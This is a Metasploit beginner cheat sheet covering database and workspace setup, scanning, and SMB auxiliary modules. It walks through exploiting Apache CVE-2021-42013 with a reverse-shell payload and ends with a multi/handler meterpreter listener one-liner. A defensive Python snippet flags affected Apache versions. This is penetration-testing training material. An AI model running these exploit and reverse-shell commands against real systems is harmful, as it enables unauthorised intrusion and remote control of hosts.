101
Setup
Database
Metasploit Framework (MSF) in Kali Linux doesn't start its database (PostgreSQL) by default, but it’s useful for storing target data and tracking exploits.
# Initialize database
sudo msfdb init
# Start PostgreSQL service
sudo service postgresql start
# Launch MSF Console
sudo msfconsole -q
# Check database connection
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
Workspaces
MSF uses workspaces to separate different tests and avoid data mix-up.
# Check current workspace
msf6 > workspace
# Create a new workspace
msf6 > workspace -a test_ws
[*] Added workspace: test_ws
# Switch to a specific workspace
msf6 > workspace test_ws
[*] Workspace: test_ws
# Check current workspace again
msf6 > workspace
default
* test_ws
Scan results will now be saved in the selected workspace.
# Scan target
msf6 > db_nmap -A 192.168.50.202
# List discovered hosts
msf6 > hosts
# List discovered services
msf6 > services
# List hosts with port 445 (e.g., SMB service)
msf6 > services -p 445
Modules
MSF includes modules for various purposes, categorized for ease of use.
# List module categories
msf6 > show -h
Auxiliary
Auxiliary modules perform tasks like scanning, fuzzing, and enumeration.
# List all auxiliary modules
msf6 > show auxiliary
# Filter modules by type
msf6 > search type:auxiliary smb
# Filter by name (e.g., SMB version scanner)
msf6 > search smb_version
# Use a specific module
msf6 > use 0
# View module info
msf6 auxiliary(scanner/smb/smb_version) > info
# List module options
msf6 auxiliary(scanner/smb/smb_version) > show options
# List required options that are not yet set
msf6 auxiliary(scanner/smb/smb_version) > show missing
# Set required options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.50.202
# Run module
msf6 auxiliary(scanner/smb/smb_version) > run
Exploit
Exploit modules in MSF target specific vulnerabilities in applications or services.
Key Features:
Database Integration: Automatically tracks targets, services, and vulnerabilities.
Reliability: Repeatable sessions for stable access.
Payload Flexibility: Users can select payloads based on the exploit.
# Create a workspace for exploits
msf6 > workspace -a exploits
msf6 > workspace exploits
# Set target host
msf6 > setg RHOSTS 192.168.225.16
# Search for CVE-2021-42013 exploit
msf6 > search CVE-2021-42013
# Select exploit module
msf6 > use 0
# Configure payload and options
msf6 exploit(multi/http/apache_normalize_path_rce) > set LHOST 192.168.45.242
msf6 exploit(multi/http/apache_normalize_path_rce) > set SSL false
msf6 exploit(multi/http/apache_normalize_path_rce) > set RPORT 80
msf6 exploit(multi/http/apache_normalize_path_rce) > set payload linux/x64/shell_reverse_tcp
# Run exploit
msf6 exploit(multi/http/apache_normalize_path_rce) > run
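A defender-side use of the same workspace data, as an added example that is not part of the original page: it reads a CSV written with `services -o <file>` and flags open services whose banner reports Apache httpd 2.4.49 or 2.4.50, the releases affected by CVE-2021-42013. The column names, the `triage` function and the sample rows are assumptions constructed for illustration.

```python
import csv
import io
import re

# CVE-2021-42013 affects Apache HTTP Server 2.4.49 and 2.4.50 (fixed in 2.4.51).
AFFECTED_VERSIONS = {"2.4.49", "2.4.50"}

# nmap-style banner as stored in the "info" column, e.g. "Apache httpd 2.4.49 ((Unix))".
BANNER_RE = re.compile(r"\bApache httpd (\d+\.\d+\.\d+)\b")

# Constructed sample of a `services -o` export; the column names are an assumption.
SAMPLE_EXPORT = '''host,port,proto,name,state,info
"10.10.0.11","80","tcp","http","open","Apache httpd 2.4.49 ((Unix))"
"10.10.0.12","443","tcp","https","open","Apache httpd 2.4.50 ((Unix) OpenSSL/1.1.1)"
"10.10.0.13","80","tcp","http","open","Apache httpd 2.4.51 ((Debian))"
"10.10.0.14","8080","tcp","http","open","Apache Tomcat 9.0.31"
"10.10.0.15","80","tcp","http","closed","Apache httpd 2.4.49 ((Unix))"
"10.10.0.16","80","tcp","http","open","Apache httpd"
"10.10.0.17","445","tcp","microsoft-ds","open",""
'''


def triage(csv_text):
    """Split open services into affected Apache releases and unversioned HTTP banners."""
    affected, unversioned = [], []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if (row.get("state") or "").strip().lower() != "open":
            continue  # closed or filtered ports are not reachable services
        info = (row.get("info") or "").strip()
        name = (row.get("name") or "").strip().lower()
        endpoint = (row["host"], int(row["port"]))
        match = BANNER_RE.search(info)
        if match:
            if match.group(1) in AFFECTED_VERSIONS:
                affected.append(endpoint + (match.group(1),))
        elif name.startswith("http") and (not info or "Apache httpd" in info):
            # The banner hides the version, so it cannot clear the host.
            unversioned.append(endpoint)
    return {"affected": affected, "unversioned": unversioned}


if __name__ == "__main__":
    report = triage(SAMPLE_EXPORT)
    for host, port, version in report["affected"]:
        print(f"PATCH  {host}:{port} Apache httpd {version} (upgrade to 2.4.51 or later)")
    for host, port in report["unversioned"]:
        print(f"VERIFY {host}:{port} version not disclosed in banner")
```

A banner match is only a triage signal; hosts in the `unversioned` list still need the installed package version checked directly.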
Sessions & Jobs
Sessions manage interactions with successfully exploited targets. Jobs run in the background.
# Background the current session (Ctrl+Z)
^Z
Background session 1? [y/N] y
# List active sessions
msf6 > sessions -l
# Interact with a session
msf6 > sessions -i 1
# Close a session
msf6 > sessions -k 1
Inline Commands
$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.45.157; set LPORT 9999; exploit -j"